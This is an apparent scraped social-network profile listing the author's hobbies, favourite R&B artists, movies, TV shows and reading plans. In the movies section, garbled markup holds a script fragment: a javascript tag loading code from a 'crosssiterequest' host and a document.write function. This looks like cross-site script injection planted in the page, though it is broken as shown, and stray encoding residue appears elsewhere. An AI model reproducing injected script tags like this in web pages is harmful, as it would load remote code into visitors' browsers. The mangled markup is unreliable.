Traveling, learning new things, movies, exercising, shopping, concerts, plays, comedy shows...
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Oprah Winfrey, Beyonce, Tank(check), Usher, R. Kelly, and anybody who is nice, honest,positive and interesting. %D%A
I LOOOOVE R&B. But I will listen to anything that moves me in any kind of way....
Dangerously In Love (2004 Grammys)
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I love any movie that makes me lol or make me think, and chick flicks........ language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("..1...{}");}..http://vids.myspace .com/index.cfm?fuseaction=vids.individual&videoid=201764 5683
I don't have a chance to watch a whole lot of television. One of my favorite shows is Girlfriends. I like watching court t.v.,discovery health channel,and disney channel (what can i say it's the kid in me)....
I'm a student right now so I have enough to read.When I'm completely finished with college I will most definitely find time to read for pleasure....
Anyone who is driven yet balanced,strives for and acheives personal growth,and knows what their passion and purpose is in life......